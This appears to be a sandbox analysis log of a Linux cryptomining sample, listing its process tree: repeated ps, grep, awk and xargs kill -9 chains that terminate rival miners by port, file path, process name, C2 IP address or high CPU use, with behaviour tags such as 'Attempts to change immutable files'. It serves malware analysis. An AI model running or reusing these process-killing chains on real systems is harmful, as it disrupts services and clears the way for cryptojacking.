/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1736
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1735
-
/bin/grepgrep :55552⤵PID:1734
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1744
-
/bin/grepgrep -v -2⤵PID:1743
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1742
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1741
-
/bin/grepgrep :66662⤵PID:1740
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1750
-
/bin/grepgrep -v -2⤵PID:1749
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1748
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1747
-
/bin/grepgrep :66652⤵PID:1746
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1756
-
/bin/grepgrep -v -2⤵PID:1755
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1754
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1753
-
/bin/grepgrep :66672⤵PID:1752
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1762
-
/bin/grepgrep -v -2⤵PID:1761
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1760
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1759
-
/bin/grepgrep :77772⤵PID:1758
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1768 -
/bin/grepgrep -v -2⤵PID:1767
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1766
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1765
-
/bin/grepgrep :84442⤵PID:1764
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1774
-
/bin/grepgrep -v -2⤵PID:1773
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1772
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1771
-
/bin/grepgrep :33472⤵PID:1770
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1782
-
/bin/grepgrep -v -2⤵PID:1781
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1780
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1779
-
/bin/grepgrep :144442⤵PID:1778
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1791
-
/bin/grepgrep -v -2⤵PID:1790
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1789
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1788
-
/bin/grepgrep :144332⤵PID:1787
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1798 -
/bin/grepgrep -v -2⤵PID:1797
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1796
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1795
-
/bin/grepgrep :135312⤵PID:1794
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1803
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1802
-
/bin/grepgrep -v grep2⤵PID:1801
-
/bin/grepgrep "sleep 60"2⤵PID:1800
-
/bin/psps aux2⤵
- Process Discovery
PID:1799 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1808
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1807
-
/bin/grepgrep -v grep2⤵PID:1806
-
/bin/grepgrep ./crun2⤵PID:1805
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1804 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1813 -
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1812
-
/bin/grepgrep -v grep2⤵PID:1811
-
/bin/grepgrep -vw salt-minions2⤵PID:1810
-
/bin/psps aux2⤵
- Process Discovery
PID:1809 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1818 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1817
-
/bin/grepgrep :33332⤵PID:1816
-
/bin/grepgrep -v grep2⤵PID:1815
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1814 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1823
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1822
-
/bin/grepgrep :55552⤵PID:1821
-
/bin/grepgrep -v grep2⤵PID:1820
-
/bin/psps aux2⤵PID:1819
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1828 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1827
-
/bin/grepgrep "kworker -c\\"2⤵PID:1826
-
/bin/grepgrep -v grep2⤵PID:1825
-
/bin/psps aux2⤵PID:1824
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1833
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1832
-
/bin/grepgrep log_2⤵PID:1831
-
/bin/grepgrep -v grep2⤵PID:1830
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1829 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1838
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1837
-
/bin/grepgrep systemten2⤵PID:1836
-
/bin/grepgrep -v grep2⤵PID:1835
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1834 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1843
-
/usr/local/sbin/killkill -9 143⤵PID:1844
-
/usr/local/bin/killkill -9 143⤵PID:1844
-
/usr/sbin/killkill -9 143⤵PID:1844
-
/usr/bin/killkill -9 143⤵PID:1844
-
/sbin/killkill -9 143⤵PID:1844
-
/bin/killkill -9 143⤵
- Reads CPU attributes
PID:1844 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1842
-
/bin/grepgrep netns2⤵PID:1841
-
/bin/grepgrep -v grep2⤵PID:1840
-
/bin/psps aux2⤵PID:1839
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1849 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1848
-
/bin/grepgrep voltuned2⤵PID:1847
-
/bin/grepgrep -v grep2⤵PID:1846
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1845 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1854
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1853
-
/bin/grepgrep darwin2⤵PID:1852
-
/bin/grepgrep -v grep2⤵PID:1851
-
/bin/psps aux2⤵PID:1850
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1859
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1858
-
/bin/grepgrep /tmp/dl2⤵PID:1857
-
/bin/grepgrep -v grep2⤵PID:1856
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1855 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1864
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1863
-
/bin/grepgrep /tmp/ddg2⤵PID:1862
-
/bin/grepgrep -v grep2⤵PID:1861
-
/bin/psps aux2⤵
- Process Discovery
PID:1860 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1869
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1868
-
/bin/grepgrep /tmp/pprt2⤵PID:1867
-
/bin/grepgrep -v grep2⤵PID:1866
-
/bin/psps aux2⤵PID:1865
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1874
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1873
-
/bin/grepgrep /tmp/ppol2⤵PID:1872
-
/bin/grepgrep -v grep2⤵PID:1871
-
/bin/psps aux2⤵PID:1870
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1879
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1878
-
/bin/grepgrep "/tmp/65ccE*"2⤵PID:1877
-
/bin/grepgrep -v grep2⤵PID:1876
-
/bin/psps aux2⤵PID:1875
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1884
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1883
-
/bin/grepgrep "/tmp/jmx*"2⤵PID:1882
-
/bin/grepgrep -v grep2⤵PID:1881
-
/bin/psps aux2⤵
- Process Discovery
PID:1880 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1889
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1888
-
/bin/grepgrep "/tmp/2Ne80*"2⤵PID:1887
-
/bin/grepgrep -v grep2⤵PID:1886
-
/bin/psps aux2⤵PID:1885
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1894
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1893
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵PID:1892
-
/bin/grepgrep -v grep2⤵PID:1891
-
/bin/psps aux2⤵
- Process Discovery
PID:1890 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1899
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1898
-
/bin/grepgrep 45.76.122.922⤵PID:1897
-
/bin/grepgrep -v grep2⤵PID:1896
-
/bin/psps aux2⤵
- Process Discovery
PID:1895 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1904 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1903
-
/bin/grepgrep 51.38.191.1782⤵PID:1902
-
/bin/grepgrep -v grep2⤵PID:1901
-
/bin/psps aux2⤵
- Process Discovery
PID:1900 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1909
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1908
-
/bin/grepgrep 51.15.56.1612⤵PID:1907
-
/bin/grepgrep -v grep2⤵PID:1906
-
/bin/psps aux2⤵
- Process Discovery
PID:1905 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1914
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1913
-
/bin/grepgrep 86s.jpg2⤵PID:1912
-
/bin/grepgrep -v grep2⤵PID:1911
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1910 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1919
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1918
-
/bin/grepgrep aGTSGJJp2⤵PID:1917
-
/bin/grepgrep -v grep2⤵PID:1916
-
/bin/psps aux2⤵
- Process Discovery
PID:1915 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1924
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1923
-
/bin/grepgrep nMrfmnRa2⤵PID:1922
-
/bin/grepgrep -v grep2⤵PID:1921
-
/bin/psps aux2⤵PID:1920
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1929 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1928
-
/bin/grepgrep PuNY5tm22⤵PID:1927
-
/bin/grepgrep -v grep2⤵PID:1926
-
/bin/psps aux2⤵PID:1925
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1934 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1933
-
/bin/grepgrep I0r8Jyyt2⤵PID:1932
-
/bin/grepgrep -v grep2⤵PID:1931
-
/bin/psps aux2⤵
- Process Discovery
PID:1930 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1939
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1938
-
/bin/grepgrep AgdgACUD2⤵PID:1937
-
/bin/grepgrep -v grep2⤵PID:1936
-
/bin/psps aux2⤵PID:1935
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1944
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1943
-
/bin/grepgrep uiZvwxG82⤵PID:1942
-
/bin/grepgrep -v grep2⤵PID:1941
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1940 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1949
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1948
-
/bin/grepgrep hahwNEdB2⤵PID:1947
-
/bin/grepgrep -v grep2⤵PID:1946
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1945 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1954
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1953
-
/bin/grepgrep BtwXn5qH2⤵PID:1952
-
/bin/grepgrep -v grep2⤵PID:1951
-
/bin/psps aux2⤵PID:1950
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1959
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1958
-
/bin/grepgrep 3XEzey2T2⤵PID:1957
-
/bin/grepgrep -v grep2⤵PID:1956
-
/bin/psps aux2⤵
- Process Discovery
PID:1955 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1964
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1963
-
/bin/grepgrep t2tKrCSZ2⤵PID:1962
-
/bin/grepgrep -v grep2⤵PID:1961
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1960 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1969 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1968
-
/bin/grepgrep HD7fcBgg2⤵PID:1967
-
/bin/grepgrep -v grep2⤵PID:1966
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1965 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1974
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1973
-
/bin/grepgrep zXcDajSs2⤵PID:1972
-
/bin/grepgrep -v grep2⤵PID:1971
-
/bin/psps aux2⤵
- Process Discovery
PID:1970 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1979
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1978
-
/bin/grepgrep 3lmigMo2⤵PID:1977
-
/bin/grepgrep -v grep2⤵PID:1976
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1975 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1984
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1983
-
/bin/grepgrep AkMK4A22⤵PID:1982
-
/bin/grepgrep -v grep2⤵PID:1981
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1980 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1989
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1988
-
/bin/grepgrep AJ2AkKe2⤵PID:1987
-
/bin/grepgrep -v grep2⤵PID:1986
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1985 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1994 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1993
-
/bin/grepgrep HiPxCJRS2⤵
- System Network Configuration Discovery
PID:1992 -
/bin/grepgrep -v grep2⤵PID:1991
-
/bin/psps aux2⤵
- Process Discovery
PID:1990 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1999
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1998
-
/bin/grepgrep http_0xCC0302⤵PID:1997
-
/bin/grepgrep -v grep2⤵PID:1996
-
/bin/psps aux2⤵PID:1995
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2004
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2003
-
/bin/grepgrep http_0xCC0312⤵PID:2002
-
/bin/grepgrep -v grep2⤵PID:2001
-
/bin/psps aux2⤵
- Process Discovery
PID:2000 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2009 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2008
-
/bin/grepgrep http_0xCC0322⤵PID:2007
-
/bin/grepgrep -v grep2⤵PID:2006
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2005 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2014
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2013
-
/bin/grepgrep http_0xCC0332⤵PID:2012
-
/bin/grepgrep -v grep2⤵PID:2011
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2010 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2019 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2018
-
/bin/grepgrep C4iLM4L2⤵PID:2017
-
/bin/grepgrep -v grep2⤵PID:2016
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2015 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2024
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2023
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
PID:2022 -
/bin/grepgrep -v grep2⤵PID:2021
-
/bin/psps aux2⤵
- Process Discovery
PID:2020 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2028
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵PID:2027
-
/bin/grepgrep -v grep2⤵PID:2026
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2025 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2033 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2032
-
/bin/grepgrep /boot/vmlinuz2⤵PID:2031
-
/bin/grepgrep -v grep2⤵PID:2030
-
/bin/psps aux2⤵PID:2029
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2038
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2037
-
/bin/grepgrep i4b503a52cc52⤵PID:2036
-
/bin/grepgrep -v grep2⤵PID:2035
-
/bin/psps aux2⤵
- Process Discovery
PID:2034 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2043 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2042
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵PID:2041
-
/bin/grepgrep -v grep2⤵PID:2040
-
/bin/psps aux2⤵
- Process Discovery
PID:2039 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2048 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2047
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵PID:2046
-
/bin/grepgrep -v grep2⤵PID:2045
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2044 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2053
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2052
-
/bin/grepgrep nqscheduler2⤵PID:2051
-
/bin/grepgrep -v grep2⤵PID:2050
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2049 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2058
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2057
-
/bin/grepgrep rkebbwgqpl4npmm2⤵PID:2056
-
/bin/grepgrep -v grep2⤵PID:2055
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2054 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2064
-
/usr/local/sbin/killkill -9 14663⤵PID:2065
-
/usr/local/bin/killkill -9 14663⤵PID:2065
-
/usr/sbin/killkill -9 14663⤵PID:2065
-
/usr/bin/killkill -9 14663⤵PID:2065
-
/sbin/killkill -9 14663⤵PID:2065
-
/bin/killkill -9 14663⤵
- Reads CPU attributes
PID:2065 -
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵PID:2063
-
/bin/grepgrep "]"2⤵PID:2062
-
/bin/grepgrep -v aux2⤵PID:2061
-
/bin/grepgrep -v grep2⤵PID:2060
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2059 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2070
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2069
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵PID:2068
-
/bin/grepgrep -v grep2⤵PID:2067
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2066 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2075
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2074
-
/bin/grepgrep 0kwti6ut420t2⤵PID:2073
-
/bin/grepgrep -v grep2⤵PID:2072
-
/bin/psps aux2⤵PID:2071
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2080
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2079
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵PID:2078
-
/bin/grepgrep -v grep2⤵PID:2077
-
/bin/psps aux2⤵
- Process Discovery
PID:2076 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2087
-
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵PID:2086
-
/bin/grepgrep -v _2⤵PID:2085
-
/bin/grepgrep -v -2⤵PID:2084
-
/bin/grepgrep -v /2⤵PID:2083
-
/bin/grepgrep -v grep2⤵PID:2082
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2081 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2092
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2091
-
/bin/grepgrep "\\[^"2⤵PID:2090
-
/bin/grepgrep -v grep2⤵PID:2089
-
/bin/psps aux2⤵PID:2088
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2097
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2096
-
/bin/grepgrep rsync2⤵PID:2095
-
/bin/grepgrep -v grep2⤵PID:2094
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2093 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2102
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2101
-
/bin/grepgrep watchd0g2⤵PID:2100
-
/bin/grepgrep -v grep2⤵PID:2099
-
/bin/psps aux2⤵
- Process Discovery
PID:2098 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2107
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2106
-
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2105
-
/bin/grepgrep -v grep2⤵PID:2104
-
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2105
-
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2105
-
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2105
-
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2105
-
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2105
-
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2105
-
/bin/psps aux2⤵
- Process Discovery
PID:2103 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2112 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2111
-
/bin/grepgrep 158.69.133.18:82202⤵PID:2110
-
/bin/grepgrep -v grep2⤵PID:2109
-
/bin/psps aux2⤵
- Process Discovery
PID:2108 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2117
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2116
-
/bin/grepgrep /tmp/java2⤵PID:2115
-
/bin/grepgrep -v grep2⤵PID:2114
-
/bin/psps aux2⤵PID:2113
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2122
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2121
-
/bin/grepgrep gitee.com2⤵PID:2120
-
/bin/grepgrep -v grep2⤵PID:2119
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2118 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2127
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2126
-
/bin/grepgrep /tmp/java2⤵PID:2125
-
/bin/grepgrep -v grep2⤵PID:2124
-
/bin/psps aux2⤵
- Process Discovery
PID:2123 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2137 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2136
-
/bin/grepgrep 104.248.4.1622⤵PID:2135
-
/bin/grepgrep -v grep2⤵PID:2134
-
/bin/psps aux2⤵
- Process Discovery
PID:2133 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2144 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2143
-
/bin/grepgrep 89.35.39.782⤵PID:2142
-
/bin/grepgrep -v grep2⤵PID:2141
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2140 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2149
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2148
-
/bin/grepgrep /dev/shm/z3.sh2⤵PID:2147
-
/bin/grepgrep -v grep2⤵PID:2146
-
/bin/psps aux2⤵PID:2145
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2155
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2154
-
/bin/grepgrep kthrotlds2⤵PID:2153
-
/bin/grepgrep -v grep2⤵PID:2152
-
/bin/psps aux2⤵
- Process Discovery
PID:2151 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2160
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2159
-
/bin/grepgrep ksoftirqds2⤵PID:2158
-
/bin/grepgrep -v grep2⤵PID:2157
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2156 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2165
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2164
-
/bin/grepgrep netdns2⤵PID:2163
-
/bin/grepgrep -v grep2⤵PID:2162
-
/bin/psps aux2⤵PID:2161
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2170
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2169
-
/bin/grepgrep watchdogs2⤵PID:2168
-
/bin/grepgrep -v grep2⤵PID:2167
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2166 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2181 -
/usr/bin/awkawk "\$3>80.0{print \$2}"2⤵PID:2180
-
/bin/grepgrep -v atd2⤵PID:2178
-
/bin/grepgrep -v salt-minions2⤵PID:2179
-
/bin/grepgrep -v apache22⤵PID:2177
-
/bin/grepgrep -v dblaunched2⤵PID:2176
-
/bin/grepgrep -v dblaunchs2⤵PID:2175
-
/bin/grepgrep -v dblaunch2⤵PID:2174
-
/bin/grepgrep -v root2⤵PID:2173
-
/bin/grepgrep -v grep2⤵PID:2172
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2171 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2187
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2186
-
/bin/grepgrep " ps"2⤵PID:2185
-
/bin/grepgrep -v aux2⤵PID:2184
-
/bin/grepgrep -v grep2⤵PID:2183
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2182 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2192
-
/usr/bin/cutcut -c 9-152⤵PID:2191
-
/bin/grepgrep sync_supers2⤵PID:2190
-
/bin/grepgrep -v grep2⤵PID:2189
-
/bin/psps aux2⤵
- Process Discovery
PID:2188 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2197 -
/usr/bin/cutcut -c 9-152⤵PID:2196
-
/bin/grepgrep cpuset2⤵PID:2195
-
/bin/grepgrep -v grep2⤵PID:2194
-
/bin/psps aux2⤵PID:2193
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2203
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2202
-
/bin/grepgrep "x]"2⤵PID:2201
-
/bin/grepgrep -v aux2⤵PID:2200
-
/bin/grepgrep -v grep2⤵PID:2199
-
/bin/psps aux2⤵
- Process Discovery
PID:2198 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2209 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2208
-
/bin/grepgrep "sh] <"2⤵PID:2207
-
/bin/grepgrep -v aux2⤵PID:2206
-
/bin/grepgrep -v grep2⤵PID:2205
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2204 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2215
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2214
-
/bin/grepgrep " \\[]"2⤵PID:2213
-
/bin/grepgrep -v aux2⤵PID:2212
-
/bin/grepgrep -v grep2⤵PID:2211
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2210 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2220
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2219
-
/bin/grepgrep /tmp/l.sh2⤵PID:2218
-
/bin/grepgrep -v grep2⤵PID:2217
-
